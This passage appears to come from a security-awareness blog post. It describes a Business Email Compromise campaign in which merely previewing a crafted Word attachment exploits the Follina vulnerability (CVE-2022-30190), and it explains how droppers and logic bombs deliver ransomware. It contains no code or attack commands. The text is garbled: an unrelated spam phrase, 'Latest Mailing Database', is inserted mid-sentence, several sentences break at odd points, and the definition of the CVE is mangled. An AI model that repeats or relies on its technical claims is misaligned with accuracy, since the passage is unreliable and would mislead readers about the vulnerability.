Just so happens that you are already working through a long queue of urgent emails, so you think, “What’s one more?” and smile. What you don’t know is that the last urgent email you received was sent by an attacker. This attacker is weeks into a complex Business Email Compromise (BEC) campaign. Their campaign involves compromising business accounts – like your M365 account – and then sending malware to the contacts in those accounts’ contact list.
The contacts are completely unaware that the sender’s account has been compromised. You read the attacker’s email, thinking it’s from a trusted contact. The email instructs you to open the Word Document attached. Instead of opening it, you just roll your mouse’s cursor over the document for a preview of the Word Document. That’s all it took to infect Latest Mailing Database your device. Simply previewing the maliciously crafted Word document was enough of an action to begin the exploitation of native Microsoft logic. Excuse me…what happened? Ransomware strikes without notice. A small piece of software commonly.
Called a dropper was downloaded using social engineering. Reported on Twitter by security researcher Kevin Baumont and dubbed MS-MSDDT “Follina.” CVE-2022-30190 is a Microsoft Windows Security for remote code execution by using a native Microsoft feature called a custom template. Security researcher John Hammond shows the power of Follina in this GitHub commit. Droppers often use logic bombs to trigger the download of the main payload having malware. Once the dropper is downloaded to a device it waits for the designated condition(s) to be met, this could be as simple as waiting for a specific date and time or even a combination of conditions. After the dropper executes.